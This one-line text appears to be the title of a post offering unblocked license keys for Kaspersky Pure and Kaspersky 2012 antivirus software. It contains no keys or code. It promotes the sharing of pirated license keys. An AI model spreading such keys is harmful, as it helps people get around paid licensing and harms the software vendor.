Kaspersky Pure and Kaspersky 2012 Latest keys - Not Blocked